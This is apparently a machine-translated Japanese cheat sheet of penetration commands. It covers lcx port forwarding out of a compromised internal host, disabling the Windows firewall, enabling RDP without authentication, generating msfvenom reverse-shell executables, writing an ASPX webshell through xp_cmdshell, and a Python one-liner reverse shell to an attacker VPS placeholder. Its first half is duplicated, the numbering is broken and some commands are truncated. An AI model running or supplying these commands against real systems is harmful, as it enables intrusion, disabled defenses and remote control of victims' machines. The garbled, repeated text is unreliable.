浸透常用命令ノート
1489 ワード
1.イントラネット浸透ポート転送:
制御対象マシンで実行するには、次の手順に従います.
lcx.exe -slave 216.32.*.*(1つの外部ネットワークip)51 192.168.2.32(内部ネットワークip)エンドスローガン
Netsh firewall set opmode disable 3389オープン後ファイアウォールを閉じる
ネイティブで実行:
lcx.exe listen 51 3389
2.win 7が3389を開く
3.msf生成exe
4.xp_cmdshellは馬を書きます
exec xp_cmdshell'echo^^>パス+1.aspx'
5.pythonバウンスshell
制御対象マシンで実行するには、次の手順に従います.
lcx.exe -slave 216.32.*.*(1つの外部ネットワークip)51 192.168.2.32(内部ネットワークip)エンドスローガン
Netsh firewall set opmode disable 3389オープン後ファイアウォールを閉じる
ネイティブで実行:
lcx.exe listen 51 3389
2.win 7が3389を開く
1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired
3.msf生成exe
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
2 msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.mach
4.xp_cmdshellは馬を書きます
exec xp_cmdshell'echo^^>パス+1.aspx'
5.pythonバウンスshell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" VPSIP", ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'